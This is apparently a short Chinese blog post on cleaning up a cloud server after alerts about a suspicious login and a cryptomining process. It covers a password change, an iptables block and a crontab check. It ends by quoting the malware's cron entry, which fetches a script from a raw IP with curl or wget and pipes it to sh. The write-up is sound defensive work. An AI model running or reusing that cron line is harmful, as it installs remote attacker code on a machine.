在收到阿里云的安全警告2条
1、异常登录-ECS在非常用地登录
2、恶意进程(云查杀)-挖矿程序
根据提示分析,当有异常登录时,基本上是服务器的密码被破解了,所以第一步是先修改服务器的密码
输入命令passwd 回车输入新的密码
第二步、查封可疑IP,根据阿里云的提示使用iptabes禁止可疑IP的连接
iptables -I INPUT -s 68.183.140.39 -j DROP
查看一下是否增加进去了
iptables -L -n -v
第三步、查杀对应的病毒,大部分的病毒无非通过crontab和常驻内存进行复制;所以我们先去查一下crontab
输入命令crontab -e看一下是否有可疑的命令,我的查找到如下的命令
*/15 * * * * (/usr/bin/uzmnfa4||/usr/libexec/uzmnfa4||/usr/local/bin/uzmnfa4||/tmp/uzmnfa4||curl -m180 -fsSL http://68.183.140.39:8000/i.sh||wget -q -T180 -O- http://68.183.140.39:8000/i.sh) | sh